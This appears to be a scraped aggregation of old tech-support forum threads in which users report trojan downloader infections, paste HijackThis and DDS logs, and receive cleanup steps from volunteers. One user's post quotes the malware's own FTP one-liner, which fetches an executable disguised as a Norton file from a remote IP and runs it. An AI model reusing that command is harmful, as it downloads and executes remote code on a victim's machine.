Ok, so every time i open up an internet explorer window i automatically get told by AVG that i have Trojan horse Downloader.Generic.NON on my pc, it finds it twice at least. Also even before i go anywhere on the internet i look in my History and find linkschain.net...i can only guess that this is where the Trojan has originated from. Help me guys AVG cant tackle this thing.
 

A:Solved: AVG found Trojan horse Downloader.Generic.NON

14 more replies
Answer Match 68.04%

Hi, we have McAfee running on our computer and about 3 days ago it started showing warnings about pc infected with this trojan. My attempts of cleaning pc from this trojan have all failed.
I have read all the stickies, installed and run the recommended antispyware programs. They have detected other infected files, cleaned those and here I am after all this cleaning, still getting the warning about the generic downloader.
Thanks much in advance for the help!

Here is my HijackThis log:

Logfile of HijackThis v1.99.1
Scan saved at 10:36:21 PM, on 2/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
c:\PROGRA~1\mcafee.co... Read more

A:Trojan found - xlibgfl254.dll infected by Generic Downloader.bt

Hi megan,

Welcome to Tech Support Forum!

I apologize for the delay in getting to your log. The helpers here are all volunteers and are not online 24-hours a day. If you are still having malware problems I will be glad to help.

OK, let's do this first.

Please download CCleaner (freeware) and save it to your desktop:Run the CCleaner installer.
During installation process, please UNCHECK "Add CCleaner Yahoo! Toolbar".
Once installed, run CCleaner and click the Windows tab.
Select the following:Check everything under the Internet Explorer section.
Check everything under the Windows Explorer section.
Check everything under the System section.
Check ONLY Old Prefetch data under the Advanced section.

Then, click the Applications tab:UNCHECK everything there.

Next, click the Options button, then click the Advanced button:UNCHECK : "Only delete files in Windows Temp folders older than 48 hours".

Next, click the Cleaner button, then click the Run Cleaner button (bottom right), then Exit.

CAUTION : Please do NOT use the Issues button. This is a built-in registry cleaner. If you don?t know how to use it, you may cause irreparable damage to your system.


NEXT:

Let's run an online scan to make sure we're not leaving anything behind.

Please do an online scan with Kaspersky Online Scanner:Click on Kaspersky Online Scanner.
You will be prompted to install an ActiveX component from Kaspersky, click Yes.
The program will launch and then begin dow... Read more

9 more replies
Answer Match 67.2%

Hallo Techguy,

AVG has identified and healed these viruses, but the #1 still emerges

Trojan Horse Downloader.Generic.NON
Trojan Horse Downloader.Zlob.QE
Virus identified Worm/VB.CC
Virus identified Java/ByteVerify

I have scanned PC with Ad-Aware, but it hasnt found anything.
I have switched to firefox and removed IE and MSNE from windows components
Added zonealarm (it blocks intruders. I didnt realize that there is so many connecting to my pc)

I am still getting system warnings from notification area. And consequently pop up IE adds. How come in IE if it is not installed anymore?

I would be very thankful if you could help.

Logfile of HijackThis v1.99.1
Scan saved at 14:12:47, on 11.4.2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\mssearchnet.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Utilities\ZoneAlarm\zlclient.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Acer\eManager\anbmServ.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\PROGRA~1\Grisoft\A... Read more

A:Solved: Trojan Horse (Downloader.Generic.NON and Zlob.QE) Hijack.log

10 more replies
Answer Match 67.2%

Hello,

I ahve a Dell with Windows XP SP2. As a Virus program, i am running AVG. Almost every second day AVG finds following:

File: !update.exe Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local Settings\Temp\\update.exe

File: NDR50.tmp Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local Settings\Temp\NDR50.tmp

File: NDR53.tmp Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local Settings\Temp\NDR53.tmp

File: !update-4495[1].0000 Type: Trojan horse Downloader.Generic 6 AEPH Location: C\Documents and Settings\user\Local\Temporary Internet Files\Content.IE5\F2HLC4L\Update-4495[1].000

It is moved to the Virus Vault, but it keeps comming back. Can someone help to get it out for good? It would be appreciated.
Thanks
 

A:!update.exe Type: Trojan horse Downloader.Generic 6 AEPH

Anybody out there who have an idea. Please, I cannot get rid of it.
 

1 more replies
Answer Match 66.78%

I have AVG free version 7.5 with all latest virus updates. It detects Downloader.Generic7.BDSL trojan horse with file names as 921.exe, 93.exe, 515.exe in c:\windows\system32\drivers folder.I am attaching my HJT log , please help me to remove this from my computer.Logfile of Trend Micro HijackThis v2.0.2Scan saved at 9:45:34 AM, on 10/28/2008Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\Program Files\Nero\Nero 7\InCD\InCDsrv.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\igfxtray.exeC:\WINDOWS\system32\hkcmd.exeC:\WINDOWS\SOUNDMAN.EXEC:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exeC:\Program Files\Common Files\Real\Update_OB\realsched.exeC:\Program Files\QuickTime\qttask.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Nero\Nero 7\InCD\InCD.exeC:\WINDOWS\ALCWZRD.EXEC:\Program Files\Java\jre1.5.0_03\bin\jusched.exeC:\Program Files\Messenger\msmsg... Read more

A:AVG free Version detects Downloader.Generic.BDSL Trojan Horse

Hello. I am PropagandaPanda (Panda or PP for short), and I will be helping you with your log.I apologize for the delay in response. We get overwhelmed with logs at times, but we are trying our best to keep up. If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following so I can have a look at the current condition of your machine.You may want to keep the link to this topic in your favourites. Alternatively, you can click the button at the top bar of this topic and Track this Topic, where you can choose email notifications. The topics you are tracking are shown here.Please take note of some guidelines for this fix:Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools. Doing so could cause changes to the directions I have to give you and prolong the time required. Further more, you should not be taking any advice relating to this computer from any other source throughout the course of this fix.If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean". We do not want to clean you part-way, only... Read more

2 more replies
Answer Match 64.26%

HELLO, this is my first time posting at your site but has has follow your responses to other while reseaching software and problems on the google search page. Your answers and instructions has been of geat use and help to me.Recently my computer started to run slow and I started seeing pop ups and messages saying my computer was infected. I checked my Avg Anti Virus and found seven items in the quarantine folder. The items were listed as Trojan Horse Generic 4.BO and a Trojan Horse Downloader Zlob.mcq. I ran Ad Aware and it found sever items mostly cookies and Zango, which was removed. I then ran another scan and it came up clean. I ran a Panda Active scan and it found more infections.I have included the report with my HiJack log. I had a problem running a panda scan until I notice a registry cleaner was blocking me from loading active x program needed by Panda. I was able to uninstall the program. I installed Spybot and and it found even more infections such as Hot box, freeze.com and a registry change. At this point I now know I have a serious problem. Thank you in advance for any help you can provide me and my computer. Logfile of Trend Micro HijackThis v2.0.2Scan saved at 5:54:23 PM, on 8/5/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16473)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\... Read more

A:Infected With Trojan Horse Generic 4.bo And Trojan Horse Downloader Zlob.mcq

Hello deb_girl, I am SifuMike and I will be helping you. Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update. Updating Java: Download the latest version of Java Runtime Environment (JRE) 6u2. Scroll down to where it says "Java Runtime Environment (JRE) 6u2". Click the "Download" button to the right. Check the box that says: "Accept License Agreement". The page will refresh. Click on the link to download Windows Offline Installation, Multi-language jre-6-windows-i586.exe and save to your desktop. Close any programs you may have running - especially your web browser. Go to Start > Control Panel double-click on Add/Remove programs and remove all older versions of Java.
Examples of older versions in Add or Remove Programs:
Java 2 Runtime Environment, SE v1.4.2
J2SE Runtime Environment 5.0
J2SE Runtime Environment 5.0 Update 6 Check any item with Java Runtime Environment (JRE or J2SE) in the name. Click the Remove or Change/Remove button. Repeat as many times as necessary to remove each Java versions. Reboot your computer once all Java components are removed. Then from your desktop double-click on jre-6u2-windows-i586-p.exe to install the newest version.****************** We are going to dig deeper, and that will require us to run some additional scans.You will need to use Internet Explorer for this scan. D... Read more

5 more replies
Answer Match 63.42%

First off, I'd like to thank everyone who contributes to this forum. I just found it and I've already learned a lot from the stickies and other posts. I really appreciate the time put into it.

Now, I have a problem I was hoping to get some help with. I'm running Windows XP and for the past week my McAfee SecurityCenter has been reporting a lot of trojans/viruses/PUPs that have been removed or quarantined or that could not be repaired. Since this has happened, I've noticed my computer (especially web applications) running incredibly slowly from time to time for no obvious reason. I've also occasionally been redirected from websites that I frequent to websites I've never been to.

Below I've included a list of the items detected by McAfee and the actions it took (minus duplications) and a current HijackThis log. Any help would be appreciated, thanks.

Generic Dropper (quarantined)
Generic.dx (quarantined)
Generic Downloader (quarantined)
Generic.dx (removed)
Generic Dropper (removed)
Adware-PurityScan (cannot be repaired)
Downloader-BCF (removed)
Adware-ISM (removed)
Adware-BHO.gen.c (cannot be repaired)
Generic Pup.d (removed)
W32/Sdbot.worm (quarantined)
FakeAlert-AB!htm (removed)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:59:24 PM, on 11/10/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winl... Read more

More replies
Answer Match 63%

Hello, my husband's computer seemed to contract quite a few trojans lately according to AVG free. I tried to use it to get rid of them, but I just wanted to check if it had done the job and if there is anything still lingering. Also I would like to prevent thhese infections happening again, as it seems a bit weird to me to have 5 different trojans at once. Can anyone say how the following trojans managed to download?

In temp folder: trojan horse generic 14.ABXY & trojan horse SHeur2.APYR

In system volume information _restore: trojan horse Downloader Generic 8.BJPU & another 14.ABXY

In temp internet files: trojan horse generic 13.BUBK

Thanks a lot for your time and please let me know if you need anymore info!! I appreciate it

DDS log:

DDS (Ver_09-07-30.01) - NTFSx86
Run by Gerard Sabapathy at 21:40:44.50 on 25/08/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_13
Microsoft Windows XP Professional 5.1.2600.3.1252.44.1033.18.319.64 [GMT 2:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Java\jre6\bin&... Read more

A:Trying to get rid of trojans generic 14.ABXY, SHeur2.APYR, Downloader Generic 8.BJPU

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.??If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine.??Please perform the following scan:Download DDS by sUBs from one of the following links.??Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool.??No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 62.16%

First of all would like to say hi to everyone at TSG!

Have been referred to this while using McAfeeHelp, my system is infected with New Malware.j / Generic Downloader.f & Downloader-AYL.

Every time i start my browser, McAfee pops with messages of files infected by the above. It is able to delete files infected by Generic Downloader.f & Downloader-AYL but no the ones by New Malware.j. My system's 'TASK MANAGER' is not working. I get a message that 'Task Manager has been disabled by your administrator'.

Have tried scanning with Spyware Doctor 2.0.1.143 & Ad-Aware SE Personal but of no help. Reading the previous threads, have downloaded HijackThis. Kindly assist, find below the log file of HijackThis.

Logfile of HijackThis v1.99.1Scan saved at 2:35:07 PM, on 1/13/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\ALCWZRD.EXE
C:\WINDOWS\ALCMTR.EXE
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\WINDOWS\s... Read more

A:Solved: Help Removing Trojans : New Malware.j / Generic Downloader.f / Downloader-AYL

13 more replies
Answer Match 62.16%

Hi everybody,

I have a machine that is running XP and it was just formatted. But it appears to have the Trojan-Downloader virus.
It tries to run a long command to do an ftp and download (I assume) other malicious files.
It disables the Firewall, then opens cmd and tries to run a command such as:

cmd /c echo OPEN 190.24.97.209 17848>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

It's not always the same command.
And then habilitates the firewall again.

Sometimes it also opens the task manager and tries to do something.

I have downloaded the hijackthis application and I'm attaching the log file after running it.
Can you guide me onto what should I do next?

Thanks.

Juliana

Logfile of HijackThis v1.99.1
Scan saved at 04:49:14 p.m., on 17/05/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Archivos de programa\iTunes\iTunesHelper.exe
C:\Archivos de programa\QuickTime\qttask.exe
C:\Archivos de programa\Java\jre1.6.0_01\bin\jusched.exe
C:\ARCHIV~1\SYMANT~1\SYMANT~1\vptray.exe
C:\Archivos de programa\Spyware Doctor\SDTrayApp.e... Read more

More replies
Answer Match 62.16%

My laptop has been infected with the Trojan.Generic virus.
After reading and reading I've realized that this is probably the best way to fix it.
Can somebody tell me what doesnt belong, haha.

Hijackthis file:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:22:49 PM, on 3/22/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16608)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\AVGGRI~1\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\AVGGRI~1\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\AVGGRI~1\AVGFRE~1\avgemc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.e... Read more

More replies
Answer Match 62.16%

I was bombarded by several viruses/trojan horses/etc. early this morning. The majority of them were successfully quarantined. There is one (or maybe more than one) that is just being called "Trojan Horse" and nothing more specific. There isn't a particular virus/filename. The virus is attached to msasvc.exe in the c:/windows/system32/ file, and my virus scanner alert is reporting "access denied". Also, one of the reports looked like it had even infiltrated my system restore points, which to be quite frank, makes me want to cry.*deep breath* Anyway, I've removed spyware from the registry before, when I had a specific filename to look for, but I have no idea what to do with this since it's just a generic threat. Additionally, when I tried to open Internet explorer to run symantec's virus scan (since I generally use Firefox for regular browsing), it would not open and gave me the error message "The application failed to start because msvcrl.dll was not found. Reinstalling the application may fix this problem." I don't know where msvcrl.dll has gone and run off to, especially since I haven't touched IE for at least a few months. .. and I certainly don't know what made it run away and how to fix it. HELP!!!!Here's my HijackThisLog:Logfile of HijackThis v1.99.1Scan saved at 7:07:49 PM, on 1/13/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\... Read more

A:Generic "trojan Horse"... Help! My Hijackthis Log

Hello,Your system is terribly infected. Problem with these infections nowadays is, it causes a lot of damage. Even if we clean the malware off your system, I can't guarantee that your system will be clean afterwards, because these infections/bundles leave a lot of leftovers behind that most scanners won't even recognise and logs won't show.Also, I can't promise you we can repair all the damage it caused... Even after cleaning the malware, you can still get errors afterwards because of the damage. Solving these is not always possible since it will be searching for a needle in a haystack to find the right cause and solution.So, we can try to clean this up and do what we can, but keep in mind that we can't solve ALL problems this malware already caused.The current formatting of your log makes it difficult to read, so in notepad:On top, click Format >uncheck Word WrapI also suspect the pe386 rootkit here It's better to print out the next instructions or save it in notepad, because you also have to work in safe mode without networking support, so this page wouldn't be available then.It is also important you don't miss a step and perform everything in the right order!!Uninstall AdwareFilter from software > add/remove programs, because this is a so called spyware remover with a bad reputation, present on the blacklist.* Please download, install, and update AVG Anti-SpywareLoad AVG Anti-Spyware and then click the Update tab at the top. Under Manual Update click Start u... Read more

11 more replies
Answer Match 62.16%

A box keeps popping up asking me to run a csc.exe program. I keep saying no, but I cannot get rid of it. Please help. When I was running the hijack this a box popped up and said that it could not run in the "host" files and I needed to run as an adminstrator since I use vista. Is it complete or do I have to do something else?I am somewhat computer literate, but I follow directions very well. I know the dangers of fools thinking they know it all. Thanks in advance for the help DebbieLogfile of Trend Micro HijackThis v2.0.2Scan saved at 4:49:40 PM, on 9/13/2009Platform: Windows Vista SP1 (WinNT 6.00.1905)MSIE: Internet Explorer v7.00 (7.00.6001.18294)Boot mode: NormalRunning processes:C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exeC:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exeC:\hp\support\hpsysdrv.exeC:\Program Files (x86)\Java\jre6\bin\jusched.exeC:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exeC:\Program Files (x86)\AVG\AVG8\avgtray.exeC:\Program Files (x86)\Yahoo!\Messenger\ymsgr_tray.exeC:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exeC:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exeC:\Program Files (x86)�... Read more

A:a hijackthis log posted, generic trojan

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 62.16%

McAfee found those files and I wondering if they are slowing down my computer. I am also having problems removing programs and installing Microsoft security updates. When ever I try to remove certain programs I get a message that says, "This installation is forbidden by system policy. Contact your system administrator." My computer is a stand alone and I have admin privileges . Here is my log. Any help would be appreciated. Logfile of Trend Micro HijackThis v2.0.2Scan saved at 2:51:38 PM, on 4/25/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16827)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Intel\Wireless\Bin\S24EvMon.exeC:\WINDOWS\System32\WLTRYSVC.EXEC:\WINDOWS\System32\bcmwltry.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\Ati2evxx.exeC:\Program Files\Bonjour\mDNSResponder.exeC:\Program Files\CheckPoint\SSL Network Extender\slimsvc.exeC:\Program Files\Common Files\Creative Labs Shared\Service\CreativeLicen... Read more

A:Help removing Generic!Artemis, MK Recorder, and Generic Downloader

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

2 more replies
Answer Match 61.74%

First of all would like to say hi to everyone at Tech Support!

Have been referred to this while using McAfeeHelp, my system is infected with New Malware.j / Generic Downloader.f & Downloader-AYL.

Every time i start my browser, McAfee pops with messages of files infected by the above. It is able to delete files infected by Generic Downloader.f & Downloader-AYL but no the ones by New Malware.j. My system's 'TASK MANAGER' is not working. I get a message that 'Task Manager has been disabled by your administrator'.

Have tried scanning with Spyware Doctor 2.0.1.143 & Ad-Aware SE Personal but of no help. Reading the previous threads, have downloaded HijackThis. Kindly assist, find below the log file of HijackThis.

Logfile of HijackThis v1.99.1
Scan saved at 2:35:07 PM, on 1/13/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\ALCWZRD.EXE
C:\WINDOWS\ALCMTR.EXE
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusche... Read more

A:Help Removing Trojans: New Malware.j / Generic Downloader.f / Downloader-AYL

Hello parry, and welcome to TSF


Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools,
then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.


Please read this post completely before begining the fix. If there's anything that you do not understand, kindly ask your questions before proceeding.
Please ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this
webpage would not be available when you're carrying out the fix.


IT IS IMPORTANT THAT YOU DON'T MISS A STEP & PERFORM EVERYTHING IN THE RIGHT ORDER.

----------------------------------------

The fixes we will use are specific to your problems and should only be used for this issue on this machine.

Please only use this topic to reply to. Do not start another thread.
If any other issues arise let me know.

The process is not instant. Please continue to review my answers until I tell you your machine is clear.
Absence of symptoms does not mean that everything is clear. So lets do this to the end!

Please make every effort to reply to my posts in a timely manner. Malware breeds malware and the longer an infection remains on a system, the more
likely additional infections will result.

----------------------------------------

DOWNLOADS


CLEANUP! version 4.52 ? TEMP... Read more

14 more replies
Answer Match 61.74%

Logfile of HijackThis v1.99.0
Scan saved at 8:53:46 PM, on 1/30/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\igfxtray.exe
C:\WINDOWS\System32\hkcmd.exe
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\WINDOWS\LTMSG.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
C:\Program Files\MSN Apps\Updater\01.02.3000.1001\en-us\msnappau.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\Yahoo!\browser\ybrwicon.exe
C:\Program Files\2Wire\2PortalMon.exe
C:\WINDOWS\System32\prvdi.exe
C:\WINDOWS\System32\ctfmon.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\PROGRA~1\Yahoo!\browser\ycommon.exe
C:\PROGRA~1\HEWLET~1\HPSHAR~1\hpgs2wnf.exe
C:\PROGRA~1\THEWEA~2\THEWEA~1.EXE
C:\WINDOWS\System32\wuauclt.exe
C:\PROGRA~1\INCRED~1\bin\IMAp... Read more

A:hELP READ HIJACKTHIS-GETTING DOWNLOADER-ME TROJAN

